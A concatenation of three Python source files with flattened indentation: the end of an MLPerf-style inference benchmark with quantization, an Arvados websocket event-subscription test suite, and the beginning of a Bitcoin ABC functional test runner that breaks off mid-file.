bs = self.max_batchsize
for i in range(0, len(idx), bs):
ie = i + bs
data, label = self.ds.get_samples(idx[i:ie])
self.tasks.put(Item(query_id[i:ie], idx[i:ie], data, label))
def finish(self):
# exit all threads
for _ in self.workers:
self.tasks.put(None)
for worker in self.workers:
worker.join()
def add_results(final_results, name, result_dict, result_list, took, show_accuracy=False):
percentiles = [50., 80., 90., 95., 99., 99.9]
buckets = np.percentile(result_list, percentiles).tolist()
buckets_str = ",".join(["{}:{:.4f}".format(p, b) for p, b in zip(percentiles, buckets)])
if result_dict["total"] == 0:
result_dict["total"] = len(result_list)
# this is what we record for each run
result = {
"took": took,
"mean": np.mean(result_list),
"percentiles": {str(k): v for k, v in zip(percentiles, buckets)},
"qps": len(result_list) / took,
"count": len(result_list),
"good_items": result_dict["good"],
"total_items": result_dict["total"],
}
acc_str = ""
if show_accuracy:
result["accuracy"] = 100. * result_dict["good"] / result_dict["total"]
acc_str = ", acc={:.3f}%".format(result["accuracy"])
if "mAP" in result_dict:
result["mAP"] = 100. * result_dict["mAP"]
acc_str += ", mAP={:.3f}%".format(result["mAP"])
# add the result to the result dict
final_results[name] = result
# to stdout
print("{} qps={:.2f}, mean={:.4f}, time={:.3f}{}, queries={}, tiles={}".format(
name, result["qps"], result["mean"], took, acc_str,
len(result_list), buckets_str))
    # fall back to top-1 accuracy when the result does not include mAP
    return result.get("mAP", result.get("accuracy", 0.0))
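# Illustrative example of the summary line printed above (all values made up):
#   <scenario> qps=123.45, mean=0.0123, time=60.250, acc=76.456%, queries=7440,
#   tiles=50.0:0.0119,80.0:0.0131,90.0:0.0140,95.0:0.0148,99.0:0.0162,99.9:0.0181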
def main():
global last_timeing
args = get_args()
log.info(args)
# find backend
backend = get_backend(args.backend)
# override image format if given
image_format = args.data_format if args.data_format else backend.image_format()
# --count applies to accuracy mode only and can be used to limit the number of images
# for testing. For perf model we always limit count to 200.
count_override = False
count = args.count
if count:
count_override = True
# dataset to use
wanted_dataset, pre_proc, post_proc, kwargs = SUPPORTED_DATASETS[args.dataset]
ds = wanted_dataset(data_path=args.dataset_path,
image_list=args.dataset_list,
name=args.dataset,
image_format=image_format,
pre_process=pre_proc,
use_cache=args.cache,
count=count, **kwargs)
# load model to backend
model = backend.load(args.model, inputs=args.inputs, outputs=args.outputs)
final_results = {
"runtime": model.name(),
"version": model.version(),
"time": int(time.time()),
"cmdline": str(args),
}
mlperf_conf = os.path.abspath(args.mlperf_conf)
if not os.path.exists(mlperf_conf):
log.error("{} not found".format(mlperf_conf))
sys.exit(1)
user_conf = os.path.abspath(args.user_conf)
if not os.path.exists(user_conf):
log.error("{} not found".format(user_conf))
sys.exit(1)
if args.output:
output_dir = os.path.abspath(args.output)
os.makedirs(output_dir, exist_ok=True)
os.chdir(output_dir)
#
# make one pass over the dataset to validate accuracy
#
count = ds.get_item_count()
# warmup
ds.load_query_samples([0])
for _ in range(5):
img, _ = ds.get_samples([0])
_ = backend.predict({backend.inputs[0]: img})
ds.unload_query_samples(None)
scenario = SCENARIO_MAP[args.scenario]
runner_map = {
lg.TestScenario.SingleStream: RunnerBase,
lg.TestScenario.MultiStream: QueueRunner,
lg.TestScenario.Server: QueueRunner,
lg.TestScenario.Offline: QueueRunner
}
runner = runner_map[scenario](model, ds, args.threads, post_proc=post_proc, \
max_batchsize=args.max_batchsize)
def issue_queries(query_samples):
runner.enqueue(query_samples)
def flush_queries():
pass
def process_latencies(latencies_ns):
# called by loadgen to show us the recorded latencies
global last_timeing
last_timeing = [t / NANO_SEC for t in latencies_ns]
log_output_settings = lg.LogOutputSettings()
log_output_settings.outdir = output_dir
log_output_settings.copy_summary_to_stdout = False
log_settings = lg.LogSettings()
log_settings.enable_trace = args.debug
log_settings.log_output = log_output_settings
settings = lg.TestSettings()
settings.FromConfig(mlperf_conf, args.model_name, args.scenario)
settings.FromConfig(user_conf, args.model_name, args.scenario)
settings.scenario = scenario
settings.mode = lg.TestMode.PerformanceOnly
if args.accuracy:
settings.mode = lg.TestMode.AccuracyOnly
if args.benchmark:
settings.mode = lg.TestMode.PerformanceOnly
if args.find_peak_performance:
settings.mode = lg.TestMode.FindPeakPerformance
if args.time:
# override the time we want to run
settings.min_duration_ms = args.time * MILLI_SEC
settings.max_duration_ms = args.time * MILLI_SEC
if args.qps:
qps = float(args.qps)
settings.server_target_qps = qps
settings.offline_expected_qps = qps
if count_override:
settings.min_query_count = count
settings.max_query_count = count
if args.samples_per_query:
settings.multi_stream_samples_per_query = args.samples_per_query
if args.max_latency:
settings.server_target_latency_ns = int(args.max_latency * NANO_SEC)
settings.multi_stream_target_latency_ns = int(args.max_latency * NANO_SEC)
sut = lg.ConstructSUT(issue_queries, flush_queries, process_latencies)
qsl = lg.ConstructQSL(count, min(count, 500), ds.load_query_samples, ds.unload_query_samples)
log.info("starting {}".format(scenario))
result_dict = {"good": 0, "total": 0, "scenario": str(scenario)}
runner.start_run(result_dict, args.accuracy)
raw_model = runner.model.model
    pattern = [r'samples_per_query : \d+', 'Mean latency.*']
def eval_func(model):
global last_timeing
runner.model.model = model
lg.StartTestWithLogSettings(sut, qsl, settings, log_settings)
if not last_timeing:
last_timeing = runner.result_timing
post_proc.finalize(result_dict, ds, output_dir=args.output)
accu = add_results(final_results, "{}".format(scenario),
result_dict, last_timeing, time.time() - ds.last_loaded, args.accuracy)
print('Accuracy: %.3f ' % (accu))
return accu
def benchmark(model):
global last_timeing
runner.model.model = model
lg.StartTestWithLogSettings(sut, qsl, settings, log_settings)
if not last_timeing:
last_timeing = runner.result_timing
file_path = os.path.join(args.output, 'mlperf_log_summary.txt')
f = open(file_path, 'r', encoding='UTF-8')
file_content = f.read()
f.close()
regex_batch = re.compile(pattern[0])
regex_late = re.compile(pattern[1])
samples_per_query = int(regex_batch.findall(file_content)[0].split(': ')[1])
latency_per_sample = int(regex_late.findall(file_content)[0].split(': ')[1])
print('Batch size = %d' % samples_per_query)
print('Latency: %.3f ms' % (latency_per_sample / 10**6))
print('Throughput: %.3f samples/sec' % (10**9/latency_per_sample))
os.chdir(os.path.join(sys.path[0], ".."))
if args.tune:
# Quantization with LPOT
from lpot.experimental import Quantization, common
quantizer = Quantization("./conf.yaml")
quantizer.model = common.Model(raw_model)
quantizer.eval_func = eval_func
q_model = quantizer()
q_model.save(args.tuned_checkpoint)
elif args.int8:
from lpot.utils.pytorch import load
int8_model = load(os.path.abspath(os.path.expanduser(args.tuned_checkpoint)), raw_model)
if args.accuracy:
eval_func(int8_model)
elif args.benchmark:
benchmark(int8_model)
else:
if args.accuracy:
eval_func(raw_model)
elif args.benchmark:
benchmark(raw_model)
runner.finish()
lg.DestroyQSL(qsl)
lg.DestroySUT(sut)
#
# write final results
#
if args.output:
with open("results.json", "w") as f:
json.dump(final_results, f, sort_keys=True, indent=4)
if __name__ == "__main__":
main()
|
test_events.py
|
import arvados
import io
import logging
import mock
import Queue
import run_test_server
import threading
import time
import unittest
import arvados_testutil
class WebsocketTest(run_test_server.TestCaseWithServers):
MAIN_SERVER = {}
TIME_PAST = time.time()-3600
TIME_FUTURE = time.time()+3600
MOCK_WS_URL = 'wss://[{}]/'.format(arvados_testutil.TEST_HOST)
def setUp(self):
self.ws = None
def tearDown(self):
try:
if self.ws:
self.ws.close()
except Exception as e:
print("Error in teardown: ", e)
super(WebsocketTest, self).tearDown()
run_test_server.reset()
def _test_subscribe(self, poll_fallback, expect_type, start_time=None, expected=1):
run_test_server.authorize_with('active')
events = Queue.Queue(100)
# Create ancestor before subscribing.
# When listening with start_time in the past, this should also be retrieved.
# However, when start_time is omitted in subscribe, this should not be fetched.
ancestor = arvados.api('v1').humans().create(body={}).execute()
filters = [['object_uuid', 'is_a', 'arvados#human']]
if start_time:
filters.append(['created_at', '>=', start_time])
self.ws = arvados.events.subscribe(
arvados.api('v1'), filters,
events.put_nowait,
poll_fallback=poll_fallback,
last_log_id=(1 if start_time else None))
self.assertIsInstance(self.ws, expect_type)
self.assertEqual(200, events.get(True, 5)['status'])
human = arvados.api('v1').humans().create(body={}).execute()
log_object_uuids = []
for i in range(0, expected):
log_object_uuids.append(events.get(True, 5)['object_uuid'])
if expected > 0:
self.assertIn(human['uuid'], log_object_uuids)
if expected > 1:
self.assertIn(ancestor['uuid'], log_object_uuids)
with self.assertRaises(Queue.Empty):
# assertEqual just serves to show us what unexpected thing
# comes out of the queue when the assertRaises fails; when
# the test passes, this assertEqual doesn't get called.
self.assertEqual(events.get(True, 2), None)
def test_subscribe_websocket(self):
self._test_subscribe(
poll_fallback=False, expect_type=arvados.events.EventClient, expected=1)
@mock.patch('arvados.events.EventClient.__init__')
def test_subscribe_poll(self, event_client_constr):
event_client_constr.side_effect = Exception('All is well')
self._test_subscribe(
poll_fallback=0.25, expect_type=arvados.events.PollClient, expected=1)
def test_subscribe_poll_retry(self):
api_mock = mock.MagicMock()
n = []
def on_ev(ev):
n.append(ev)
error_mock = mock.MagicMock()
error_mock.resp.status = 0
error_mock._get_reason.return_value = "testing"
api_mock.logs().list().execute.side_effect = (arvados.errors.ApiError(error_mock, ""),
{"items": [{"id": 1}], "items_available": 1},
arvados.errors.ApiError(error_mock, ""),
{"items": [{"id": 1}], "items_available": 1})
pc = arvados.events.PollClient(api_mock, [], on_ev, 15, None)
pc.start()
while len(n) < 2:
time.sleep(.1)
pc.close()
def test_subscribe_websocket_with_start_time_past(self):
self._test_subscribe(
poll_fallback=False, expect_type=arvados.events.EventClient,
start_time=self.localiso(self.TIME_PAST),
expected=2)
@mock.patch('arvados.events.EventClient.__init__')
def test_subscribe_poll_with_start_time_past(self, event_client_constr):
event_client_constr.side_effect = Exception('All is well')
self._test_subscribe(
poll_fallback=0.25, expect_type=arvados.events.PollClient,
start_time=self.localiso(self.TIME_PAST),
expected=2)
def test_subscribe_websocket_with_start_time_future(self):
self._test_subscribe(
poll_fallback=False, expect_type=arvados.events.EventClient,
start_time=self.localiso(self.TIME_FUTURE),
expected=0)
@mock.patch('arvados.events.EventClient.__init__')
def test_subscribe_poll_with_start_time_future(self, event_client_constr):
event_client_constr.side_effect = Exception('All is well')
self._test_subscribe(
poll_fallback=0.25, expect_type=arvados.events.PollClient,
start_time=self.localiso(self.TIME_FUTURE),
expected=0)
def test_subscribe_websocket_with_start_time_past_utc(self):
self._test_subscribe(
poll_fallback=False, expect_type=arvados.events.EventClient,
start_time=self.utciso(self.TIME_PAST),
expected=2)
def test_subscribe_websocket_with_start_time_future_utc(self):
self._test_subscribe(
poll_fallback=False, expect_type=arvados.events.EventClient,
start_time=self.utciso(self.TIME_FUTURE),
expected=0)
def utciso(self, t):
return time.strftime('%Y-%m-%dT%H:%M:%SZ', time.gmtime(t))
def localiso(self, t):
return time.strftime('%Y-%m-%dT%H:%M:%S', time.localtime(t)) + self.isotz(-time.timezone/60)
def isotz(self, offset):
"""Convert minutes-east-of-UTC to ISO8601 time zone designator"""
return '{:+03d}{:02d}'.format(offset/60, offset%60)
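    # e.g. isotz(-300) returns '-0500' and isotz(330) returns '+0530' (assuming the
    # Python 2 integer division implied by the Queue/mock imports above).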
    # Test websocket reconnection on (un)expected close
def _test_websocket_reconnect(self, close_unexpected):
run_test_server.authorize_with('active')
events = Queue.Queue(100)
logstream = io.BytesIO()
rootLogger = logging.getLogger()
streamHandler = logging.StreamHandler(logstream)
rootLogger.addHandler(streamHandler)
filters = [['object_uuid', 'is_a', 'arvados#human']]
filters.append(['created_at', '>=', self.localiso(self.TIME_PAST)])
self.ws = arvados.events.subscribe(
arvados.api('v1'), filters,
events.put_nowait,
poll_fallback=False,
last_log_id=None)
self.assertIsInstance(self.ws, arvados.events.EventClient)
self.assertEqual(200, events.get(True, 5)['status'])
# create obj
human = arvados.api('v1').humans().create(body={}).execute()
# expect an event
self.assertIn(human['uuid'], events.get(True, 5)['object_uuid'])
with self.assertRaises(Queue.Empty):
self.assertEqual(events.get(True, 2), None)
# close (im)properly
if close_unexpected:
self.ws.ec.close_connection()
else:
self.ws.close()
# create one more obj
human2 = arvados.api('v1').humans().create(body={}).execute()
# (un)expect the object creation event
if close_unexpected:
log_object_uuids = []
for i in range(0, 2):
event = events.get(True, 5)
if event.get('object_uuid') != None:
log_object_uuids.append(event['object_uuid'])
with self.assertRaises(Queue.Empty):
self.assertEqual(events.get(True, 2), None)
self.assertNotIn(human['uuid'], log_object_uuids)
self.assertIn(human2['uuid'], log_object_uuids)
else:
with self.assertRaises(Queue.Empty):
self.assertEqual(events.get(True, 2), None)
        # inspect the log messages to see whether an unexpected close was recorded
log_messages = logstream.getvalue()
closeLogFound = log_messages.find("Unexpected close. Reconnecting.")
retryLogFound = log_messages.find("Error during websocket reconnect. Will retry")
if close_unexpected:
self.assertNotEqual(closeLogFound, -1)
else:
self.assertEqual(closeLogFound, -1)
rootLogger.removeHandler(streamHandler)
def test_websocket_reconnect_on_unexpected_close(self):
self._test_websocket_reconnect(True)
def test_websocket_no_reconnect_on_close_by_user(self):
self._test_websocket_reconnect(False)
# Test websocket reconnection retry
@mock.patch('arvados.events._EventClient.connect')
def test_websocket_reconnect_retry(self, event_client_connect):
event_client_connect.side_effect = [None, Exception('EventClient.connect error'), None]
logstream = io.BytesIO()
rootLogger = logging.getLogger()
streamHandler = logging.StreamHandler(logstream)
rootLogger.addHandler(streamHandler)
run_test_server.authorize_with('active')
events = Queue.Queue(100)
filters = [['object_uuid', 'is_a', 'arvados#human']]
self.ws = arvados.events.subscribe(
arvados.api('v1'), filters,
events.put_nowait,
poll_fallback=False,
last_log_id=None)
self.assertIsInstance(self.ws, arvados.events.EventClient)
# simulate improper close
self.ws.on_closed()
# verify log messages to ensure retry happened
log_messages = logstream.getvalue()
found = log_messages.find("Error 'EventClient.connect error' during websocket reconnect.")
self.assertNotEqual(found, -1)
rootLogger.removeHandler(streamHandler)
@mock.patch('arvados.events._EventClient')
def test_subscribe_method(self, websocket_client):
filters = [['object_uuid', 'is_a', 'arvados#human']]
client = arvados.events.EventClient(
self.MOCK_WS_URL, [], lambda event: None, None)
client.subscribe(filters[:], 99)
websocket_client().subscribe.assert_called_with(filters, 99)
@mock.patch('arvados.events._EventClient')
def test_unsubscribe(self, websocket_client):
filters = [['object_uuid', 'is_a', 'arvados#human']]
client = arvados.events.EventClient(
self.MOCK_WS_URL, filters[:], lambda event: None, None)
client.unsubscribe(filters[:])
websocket_client().unsubscribe.assert_called_with(filters)
@mock.patch('arvados.events._EventClient')
def test_run_forever_survives_reconnects(self, websocket_client):
connection_cond = threading.Condition()
def ws_connect():
with connection_cond:
connection_cond.notify_all()
websocket_client().connect.side_effect = ws_connect
client = arvados.events.EventClient(
self.MOCK_WS_URL, [], lambda event: None, None)
with connection_cond:
forever_thread = threading.Thread(target=client.run_forever)
forever_thread.start()
# Simulate an unexpected disconnect, and wait for reconnect.
close_thread = threading.Thread(target=client.on_closed)
close_thread.start()
connection_cond.wait()
close_thread.join()
run_forever_alive = forever_thread.is_alive()
client.close()
forever_thread.join()
self.assertTrue(run_forever_alive)
self.assertEqual(2, websocket_client().connect.call_count)
class PollClientTestCase(unittest.TestCase):
class MockLogs(object):
def __init__(self):
self.logs = []
self.lock = threading.Lock()
def add(self, log):
with self.lock:
self.logs.append(log)
def return_list(self, num_retries=None):
with self.lock:
retval = self.logs
self.logs = []
return {'items': retval, 'items_available': len(retval)}
def setUp(self):
self.logs = self.MockLogs()
self.arv = mock.MagicMock(name='arvados.api()')
self.arv.logs().list().execute.side_effect = self.logs.return_list
self.callback_cond = threading.Condition()
self.recv_events = []
def tearDown(self):
if hasattr(self, 'client'):
self.client.close(timeout=None)
def callback(self, event):
with self.callback_cond:
self.recv_events.append(event)
self.callback_cond.notify_all()
def build_client(self, filters=None, callback=None, last_log_id=None, poll_time=99):
if filters is None:
filters = []
if callback is None:
callback = self.callback
self.client = arvados.events.PollClient(
self.arv, filters, callback, poll_time, last_log_id)
def was_filter_used(self, target):
return any(target in call[-1].get('filters', [])
for call in self.arv.logs().list.call_args_list)
def test_callback(self):
test_log = {'id': 12345, 'testkey': 'testtext'}
self.logs.add({'id': 123})
self.build_client(poll_time=.01)
with self.callback_cond:
self.client.start()
self.callback_cond.wait()
self.logs.add(test_log.copy())
self.callback_cond.wait()
self.client.close(timeout=None)
self.assertIn(test_log, self.recv_events)
def test_subscribe(self):
client_filter = ['kind', '=', 'arvados#test']
self.build_client()
self.client.subscribe([client_filter[:]])
with self.callback_cond:
self.client.start()
self.callback_cond.wait()
self.client.close(timeout=None)
self.assertTrue(self.was_filter_used(client_filter))
def test_unsubscribe(self):
client_filter = ['kind', '=', 'arvados#test']
self.build_client()
self.client.subscribe([client_filter[:]])
self.client.unsubscribe([client_filter[:]])
self.client.start()
self.client.close(timeout=None)
self.assertFalse(self.was_filter_used(client_filter))
def test_run_forever(self):
self.build_client()
with self.callback_cond:
self.client.start()
forever_thread = threading.Thread(target=self.client.run_forever)
forever_thread.start()
self.callback_cond.wait()
self.assertTrue(forever_thread.is_alive())
self.client.close()
forever_thread.join()
|
test_runner.py
|
#!/usr/bin/env python3
# Copyright (c) 2014-2019 The Bitcoin Core developers
# Copyright (c) 2017 The Bitcoin developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Run regression test suite.
This module calls down into individual test cases via subprocess. It will
forward all unrecognized arguments onto the individual test scripts.
Functional tests are disabled on Windows by default. Use --force to run them anyway.
For a description of arguments recognized by test scripts, see
`test/functional/test_framework/test_framework.py:BitcoinTestFramework.main`.
"""
import argparse
from collections import deque
import configparser
import datetime
import os
import time
import shutil
import sys
import subprocess
import tempfile
import re
import logging
import xml.etree.ElementTree as ET
import json
import threading
import multiprocessing
from queue import Queue, Empty
# Formatting. Default colors to empty strings.
BOLD, GREEN, RED, GREY = ("", ""), ("", ""), ("", ""), ("", "")
try:
# Make sure python thinks it can write unicode to its stdout
"\u2713".encode("utf_8").decode(sys.stdout.encoding)
TICK = "✓ "
CROSS = "✖ "
CIRCLE = "○ "
except UnicodeDecodeError:
TICK = "P "
CROSS = "x "
CIRCLE = "o "
if os.name != 'nt' or sys.getwindowsversion() >= (10, 0, 14393):
if os.name == 'nt':
import ctypes
kernel32 = ctypes.windll.kernel32
ENABLE_VIRTUAL_TERMINAL_PROCESSING = 4
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
        # Enable ANSI color control for stdout
stdout = kernel32.GetStdHandle(STD_OUTPUT_HANDLE)
stdout_mode = ctypes.c_int32()
kernel32.GetConsoleMode(stdout, ctypes.byref(stdout_mode))
kernel32.SetConsoleMode(
stdout, stdout_mode.value | ENABLE_VIRTUAL_TERMINAL_PROCESSING)
        # Enable ANSI color control for stderr
stderr = kernel32.GetStdHandle(STD_ERROR_HANDLE)
stderr_mode = ctypes.c_int32()
kernel32.GetConsoleMode(stderr, ctypes.byref(stderr_mode))
kernel32.SetConsoleMode(
stderr, stderr_mode.value | ENABLE_VIRTUAL_TERMINAL_PROCESSING)
    # Primitive formatting on supported terminals via ANSI escape sequences:
BOLD = ('\033[0m', '\033[1m')
GREEN = ('\033[0m', '\033[0;32m')
RED = ('\033[0m', '\033[0;31m')
GREY = ('\033[0m', '\033[1;30m')
TEST_EXIT_PASSED = 0
TEST_EXIT_SKIPPED = 77
NON_SCRIPTS = [
# These are python files that live in the functional tests directory, but
# are not test scripts.
"combine_logs.py",
"create_cache.py",
"test_runner.py",
]
TEST_PARAMS = {
    # Some tests can be run with additional parameters.
    # When a test is listed here, it will be run without parameters
# as well as with additional parameters listed here.
# This:
# example "testName" : [["--param1", "--param2"] , ["--param3"]]
# will run the test 3 times:
# testName
# testName --param1 --param2
    #    testName --param3
"rpc_deriveaddresses.py": [["--usecli"]],
"wallet_txn_doublespend.py": [["--mineblock"]],
"wallet_txn_clone.py": [["--mineblock"]],
"wallet_createwallet.py": [["--usecli"]],
"wallet_multiwallet.py": [["--usecli"]],
"wallet_watchonly.py": [["--usecli"]],
}
# Used to limit the number of tests when a list of tests is not provided on the
# command line. When --extended is specified, we run all tests; otherwise we only
# run a test if its execution time in seconds does not exceed the cutoff
# (DEFAULT_EXTENDED_CUTOFF by default).
DEFAULT_EXTENDED_CUTOFF = 40
DEFAULT_JOBS = (multiprocessing.cpu_count() // 3) + 1
class TestCase():
"""
Data structure to hold and run information necessary to launch a test case.
"""
def __init__(self, test_num, test_case, tests_dir,
tmpdir, failfast_event, flags=None):
self.tests_dir = tests_dir
self.tmpdir = tmpdir
self.test_case = test_case
self.test_num = test_num
self.failfast_event = failfast_event
self.flags = flags
def run(self, portseed_offset):
if self.failfast_event.is_set():
return TestResult(self.test_num, self.test_case,
"", "Skipped", 0, "", "")
portseed = self.test_num + portseed_offset
portseed_arg = ["--portseed={}".format(portseed)]
log_stdout = tempfile.SpooledTemporaryFile(max_size=2**16)
log_stderr = tempfile.SpooledTemporaryFile(max_size=2**16)
test_argv = self.test_case.split()
testdir = os.path.join("{}", "{}_{}").format(
self.tmpdir, re.sub(".py$", "", test_argv[0]), portseed)
tmpdir_arg = ["--tmpdir={}".format(testdir)]
time0 = time.time()
process = subprocess.Popen([sys.executable, os.path.join(self.tests_dir, test_argv[0])] + test_argv[1:] + self.flags + portseed_arg + tmpdir_arg,
universal_newlines=True,
stdout=log_stdout,
stderr=log_stderr)
process.wait()
log_stdout.seek(0), log_stderr.seek(0)
[stdout, stderr] = [log.read().decode('utf-8')
for log in (log_stdout, log_stderr)]
log_stdout.close(), log_stderr.close()
if process.returncode == TEST_EXIT_PASSED and stderr == "":
status = "Passed"
elif process.returncode == TEST_EXIT_SKIPPED:
status = "Skipped"
else:
status = "Failed"
return TestResult(self.test_num, self.test_case, testdir, status,
time.time() - time0, stdout, stderr)
def on_ci():
return os.getenv('TRAVIS') == 'true' or os.getenv(
'TEAMCITY_VERSION') is not None
def main():
# Read config generated by configure.
config = configparser.ConfigParser()
configfile = os.path.join(os.path.abspath(
os.path.dirname(__file__)), "..", "config.ini")
config.read_file(open(configfile, encoding="utf8"))
src_dir = config["environment"]["SRCDIR"]
build_dir = config["environment"]["BUILDDIR"]
tests_dir = os.path.join(src_dir, 'test', 'functional')
# Parse arguments and pass through unrecognised args
parser = argparse.ArgumentParser(add_help=False,
usage='%(prog)s [test_runner.py options] [script options] [scripts]',
description=__doc__,
epilog='''
Help text and arguments for individual test script:''',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--combinedlogslen', '-c', type=int, default=0,
help='print a combined log (of length n lines) from all test nodes and test framework to the console on failure.')
parser.add_argument('--coverage', action='store_true',
help='generate a basic coverage report for the RPC interface')
parser.add_argument(
'--exclude', '-x', help='specify a comma-separated-list of scripts to exclude.')
parser.add_argument('--extended', action='store_true',
help='run the extended test suite in addition to the basic tests')
parser.add_argument('--cutoff', type=int, default=DEFAULT_EXTENDED_CUTOFF,
help='set the cutoff runtime for what tests get run')
parser.add_argument('--force', '-f', action='store_true',
help='run tests even on platforms where they are disabled by default (e.g. windows).')
parser.add_argument('--help', '-h', '-?',
action='store_true', help='print help text and exit')
parser.add_argument('--jobs', '-j', type=int, default=DEFAULT_JOBS,
help='how many test scripts to run in parallel.')
parser.add_argument('--keepcache', '-k', action='store_true',
help='the default behavior is to flush the cache directory on startup. --keepcache retains the cache from the previous testrun.')
parser.add_argument('--quiet', '-q', action='store_true',
help='only print results summary and failure logs')
parser.add_argument('--tmpdirprefix', '-t',
default=os.path.join(build_dir, 'test', 'tmp'), help="Root directory for datadirs")
parser.add_argument(
'--failfast',
action='store_true',
help='stop execution after the first test failure')
parser.add_argument('--junitoutput', '-J',
help="File that will store JUnit formatted test results. If no absolute path is given it is treated as relative to the temporary directory.")
parser.add_argument('--testsuitename', '-n', default='Bitcoin ABC functional tests',
help="Name of the test suite, as it will appear in the logs and in the JUnit report.")
args, unknown_args = parser.parse_known_args()
# args to be passed on always start with two dashes; tests are the
# remaining unknown args
tests = [arg for arg in unknown_args if arg[:2] != "--"]
passon_args = [arg for arg in unknown_args if arg[:2] == "--"]
passon_args.append("--configfile={}".format(configfile))
# Set up logging
logging_level = logging.INFO if args.quiet else logging.DEBUG
logging.basicConfig(format='%(message)s', level=logging_level)
logging.info("Starting {}".format(args.testsuitename))
# Create base test directory
tmpdir = os.path.join("{}", "test_runner_₿₵_🏃_{:%Y%m%d_%H%M%S}").format(
args.tmpdirprefix, datetime.datetime.now())
# If we fixed the command-line and filename encoding issue on Windows,
# these two lines could be removed
if config["environment"]["EXEEXT"] == ".exe":
tmpdir = os.path.join("{}", "test_runner_{:%Y%m%d_%H%M%S}").format(
args.tmpdirprefix, datetime.datetime.now())
os.makedirs(tmpdir)
logging.debug("Temporary test directory at {}".format(tmpdir))
if args.junitoutput and not os.path.isabs(args.junitoutput):
args.junitoutput = os.path.join(tmpdir, args.junitoutput)
enable_bitcoind = config["components"].getboolean("ENABLE_BITCOIND")
if config["environment"]["EXEEXT"] == ".exe" and not args.force:
# https://github.com/bitcoin/bitcoin/commit/d52802551752140cf41f0d9a225a43e84404d3e9
# https://github.com/bitcoin/bitcoin/pull/5677#issuecomment-136646964
print(
"Tests currently disabled on Windows by default. Use --force option to enable")
sys.exit(0)
if not enable_bitcoind:
print("No functional tests to run.")
print("Rerun ./configure with --with-daemon and then make")
sys.exit(0)
# Build list of tests
all_scripts = get_all_scripts_from_disk(tests_dir, NON_SCRIPTS)
# Check all tests with parameters actually exist
for test in TEST_PARAMS:
if test not in all_scripts:
print("ERROR: Test with parameter {} does not exist, check it has "
"not been renamed or deleted".format(test))
sys.exit(1)
if tests:
# Individual tests have been specified. Run specified tests that exist
# in the all_scripts list. Accept the name with or without .py
# extension.
individual_tests = [
re.sub(r"\.py$", "", t) + ".py" for t in tests if not t.endswith('*')]
test_list = []
for t in individual_tests:
if t in all_scripts:
test_list.append(t)
else:
print("{}WARNING!{} Test '{}' not found in full test list.".format(
BOLD[1], BOLD[0], t))
# Allow for wildcard at the end of the name, so a single input can
# match multiple tests
for test in tests:
if test.endswith('*'):
test_list.extend(
[t for t in all_scripts if t.startswith(test[:-1])])
# do not cut off explicitly specified tests
cutoff = sys.maxsize
else:
# No individual tests have been specified.
        # Run all tests whose runtime does not exceed the cutoff.
test_list = all_scripts
cutoff = args.cutoff
if args.extended:
cutoff = sys.maxsize
# Remove the test cases that the user has explicitly asked to exclude.
if args.exclude:
tests_excl = [re.sub(r"\.py$", "", t)
+ (".py" if ".py" not in t else "") for t in args.exclude.split(',')]
for exclude_test in tests_excl:
if exclude_test in test_list:
test_list.remove(exclude_test)
else:
print("{}WARNING!{} Test '{}' not found in current test list.".format(
BOLD[1], BOLD[0], exclude_test))
# Update timings from build_dir only if separate build directory is used.
# We do not want to pollute source directory.
build_timings = None
if (src_dir != build_dir):
build_timings = Timings(os.path.join(build_dir, 'timing.json'))
    # Always use timings from src_dir if present
src_timings = Timings(os.path.join(
src_dir, "test", "functional", 'timing.json'))
# Add test parameters and remove long running tests if needed
test_list = get_tests_to_run(
test_list, TEST_PARAMS, cutoff, src_timings)
if not test_list:
print("No valid test scripts specified. Check that your test is in one "
"of the test lists in test_runner.py, or run test_runner.py with no arguments to run all tests")
sys.exit(0)
if args.help:
# Print help for test_runner.py, then print help of the first script
# and exit.
parser.print_help()
subprocess.check_call(
[sys.executable, os.path.join(tests_dir, test_list[0]), '-h'])
sys.exit(0)
check_script_prefixes(all_scripts)
if not args.keepcache:
shutil.rmtree(os.path.join(build_dir, "test",
"cache"), ignore_errors=True)
run_tests(
test_list,
build_dir,
tests_dir,
args.junitoutput,
tmpdir,
num_jobs=args.jobs,
test_suite_name=args.testsuitename,
enable_coverage=args.coverage,
args=passon_args,
combined_logs_len=args.combinedlogslen,
build_timings=build_timings,
failfast=args.failfast
)
def run_tests(test_list, build_dir, tests_dir, junitoutput, tmpdir, num_jobs, test_suite_name,
enable_coverage=False, args=None, combined_logs_len=0, build_timings=None, failfast=False):
args = args or []
# Warn if bitcoind is already running (unix only)
try:
pidofOutput = subprocess.check_output(["pidof", "bitcoind"])
if pidofOutput is not None and pidofOutput != b'':
print("{}WARNING!{} There is already a bitcoind process running on this system. Tests may fail unexpectedly due to resource contention!".format(
BOLD[1], BOLD[0]))
except (OSError, subprocess.SubprocessError):
pass
# Warn if there is a cache directory
cache_dir = os.path.join(build_dir, "test", "cache")
if os.path.isdir(cache_dir):
print("{}WARNING!{} There is a cache directory here: {}. If tests fail unexpectedly, try deleting the cache directory.".format(
BOLD[1], BOLD[0], cache_dir))
flags = ['--cachedir={}'.format(cache_dir)] + args
if enable_coverage:
coverage = RPCCoverage()
flags.append(coverage.flag)
logging.debug(
"Initializing coverage directory at {}".format(coverage.dir))
else:
coverage = None
if len(test_list) > 1 and num_jobs > 1:
# Populate cache
try:
subprocess.check_output([sys.executable, os.path.join(
tests_dir, 'create_cache.py')] + flags + [os.path.join("--tmpdir={}", "cache") .format(tmpdir)])
except subprocess.CalledProcessError as e:
sys.stdout.buffer.write(e.output)
raise
# Run Tests
time0 = time.time()
test_results = execute_test_processes(
num_jobs, test_list, tests_dir, tmpdir, flags, failfast)
runtime = time.time() - time0
max_len_name = len(max(test_list, key=len))
print_results(test_results, tests_dir, max_len_name,
runtime, combined_logs_len)
if junitoutput is not None:
save_results_as_junit(
test_results,
junitoutput,
runtime,
test_suite_name)
if (build_timings is not None):
build_timings.save_timings(test_results)
if coverage:
coverage_passed = coverage.report_rpc_coverage()
logging.debug("Cleaning up coverage data")
coverage.cleanup()
else:
coverage_passed = True
# Clear up the temp directory if all subdirectories are gone
if not os.listdir(tmpdir):
os.rmdir(tmpdir)
all_passed = all(map(
lambda test_result: test_result.was_successful, test_results)) and coverage_passed
sys.exit(not all_passed)
def execute_test_processes(
